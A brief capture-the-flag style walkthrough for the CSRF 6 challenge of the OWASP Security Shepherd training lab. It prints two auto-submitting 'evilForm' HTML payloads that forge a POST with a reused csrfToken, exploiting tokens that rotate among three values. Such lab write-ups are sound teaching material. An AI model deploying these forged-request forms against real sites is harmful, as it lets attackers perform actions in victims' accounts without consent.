OWASP Security Shepherd Project - CSRF 6 (CSRF Challenge)
Challenge
Solution
This challenge is actually almost exactly the same as challenge 5. We could try to find our csrfToken by viewing the source code as challenge 3.Put it into our form:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengesix/plusplus" method="POST">
<input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="141524954007799620845537402852222632888"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
Connect to the designed URL with current user login:
Try several times:
We will notice that only 3 possible csrfToken are rotating. As a result, we could just put one of them in form and wait till a user match the criteria as challenge 5.
Sample Form:
<form name="evilForm" action="https://192.168.1.5/user/csrfchallengesix/plusplus" method="POST">
<input type="hidden" name="userId" value="637e8d2e65542fe82fe6da3b0356bc0865b0b791" />
<input type="hidden" name="csrfToken" value="eccbc87e4b5ce2fe28308fd9f2a7baf3"/>
<input type="submit"/>
</form>
<script> document.evilForm.submit(); </script>
留言
張貼留言
Welcome to share your comments or questions : -)
Enjoy life!